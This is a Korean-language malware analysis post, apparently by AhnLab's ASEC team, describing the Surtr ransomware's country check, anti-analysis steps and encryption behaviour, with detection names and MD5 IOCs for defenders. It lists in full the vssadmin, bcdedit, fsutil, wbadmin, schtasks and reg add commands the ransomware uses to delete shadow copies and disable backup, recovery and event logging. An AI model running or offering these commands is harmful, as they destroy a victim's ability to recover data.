Surtr 랜섬웨어 국내 유포 중

ASEC 분석팀은 최근 내부 모니터링을 통해, 파일 암호화 후 원본 확장자 이름에 “[DycripterSupp@mailfence.com].[<랜덤문자열>].Surtr” 확장자를 추가하는 Surtr 랜섬웨어가 유포되는 것을 확인하였다.

Surtr 랜섬웨어 감염 시, [그림 1, 2]와 같이 감염된 PC의 배경화면 변경 및 랜섬노트 생성을 통해, 사용자에게 랜섬웨어 감염 사실을 주지시키며, [그림 3]과 같이 감염된 파일이 존재하는 폴더마다 랜섬노트 파일(SURTR_README.hta 및 SURTR_README.txt) 을 생성하는 특징이 있다.

[그림 1] Surtr 랜섬웨어 감염 후 변경된 배경화면
[그림 2] Surtr 랜섬웨어의 랜섬노트(SURTR_README.hta)
[그림 3] Surtr 랜섬웨어의 랜섬노트(SURTR_README.txt)

Surtr 랜섬웨어는 실질적인 파일 암호화 수행 전, 해당 파일이 실행되는 국가의 IP 주소 확인, 프로세스 리스트 확인 및 서비스 종료 등의 작업을 수행하는 특징이 있다.

먼저, 해당 랜섬웨어는 아이피 조회 서비스인 “ip-api.com” 소켓을 통해 쿼리를 수행하여, 해당 파일이 실행되는 국가 정보를 조회한다. 이후 아래의 그림과 같이 특정 국가에서 실행되는 경우, 메세지 박스 출력과 함께 실행을 중지한다.

[그림 4] 랜섬웨어 파일이 실행되는 국가 정보 확인

이후 해당 프로세스의 디버깅 상태 및 샌드박스 체크 루틴 수행 이후, 휴지통에 저장된 파일 삭제 행위를 수행하고, 랜섬웨어 실행 시 생성되는 파일 및 복사된 랜섬웨어 파일 저장에 사용되는 다음 디렉토리를 생성한다.

  • C:\ProgramData\Service
  • %TEMP%\Service

추가적으로, 해당 시스템 내 실행 중인 서비스 및 프로세스를 체크하여 [그림 5, 6]과 같이 파일 내 정의된 문자열에 해당되는 프로세스/서비스가 실행중인지 여부를 확인하는 로직이 포함되어있다.

[그림 5] 종료 대상 서비스 목록 문자열 중 일부
[그림 6] 탐지 대상 프로세스 목록 문자열 중 일부

이어서 다음 명령을 실행하여, 다음과 같이 정의된 모든 드라이브에 대해, 볼륨쉐도우 복사본의 크기를 재 조정 및 삭제를 수행하며, 복구 환경 비활성화 등 감염 이후 원본 파일 복구 난이도를 높이는 명령을 수행한다.

vssadmin resize shadowstorage /for= /on= /maxsize=401MB
vssadmin resize shadowstorage /on= /maxsize=unbounded
vssadmin.exe Delete Shadows /all /quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
fsutil.exe usn deletejournal /D C:
wbadmin.exe delete catalog -quiet
schtasks.exe /Change /TN “Microsoft\Windows\SystemRestore\SR” /disable
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore” /v DisableConfig /t REG_DWORD /d 1 /f
reg add “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

이어서 해당 랜섬웨어는 [그림 7]과 같이 모든 드라이브에 대해 파일 중 “surt”, “dll”, “exe”, “lnk” 확장자를 제외한 파일들에 대해 암호화를 수행하며, [그림 8]과 같이 특정 경로 하위에 위치한 파일의 경우 파일 암호화의 예외 대상이 된다.

[그림 7] Surtr 랜섬웨어의 암호화 예외 대상 확장자
[그림 8] Surtr 랜섬웨어의 암호화 예외 대상 폴더 중 일부

파일 암호화 수행 이후, 해당 랜섬웨어는 [그림 9]와 같이 랜섬노트 생성 및 이벤트로그 삭제 등의 추가 행위를 수행하는 특징이 있다.

[그림 9] 파일 암호화 이후 추가 수행 행위

안랩 V3 제품에서는 파일 진단, 행위 기반 진단 등을 포함하여 다양한 탐지 포인트로 Surtr 랜섬웨어를 탐지 및 대응하고 있다. 랜섬웨어 예방을 위해 출처가 불분명한 파일 실행에 주의해야 하며, 의심스러운 파일의 경우 백신을 통한 검사 및 백신 최신 업데이트가 필요하다. 해당 악성코드에 대해 자사 V3에서는 아래와 같이 진단 중이다.

[파일 진단]

  • Ransomware/Win.Generic.C5285743 (2022.10.25.02)

[행위 진단]

  • Ransom/MDP.Nemty.M2599

[IOC 정보]

  • ad539ebdf9e34e02be487134cf9a6713
  • e31b96b8a74075935360b5e5a18926e9
  • 674e7ee905d24a89af47b53b53ffc23c

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
guest

0 댓글
Inline Feedbacks
View all comments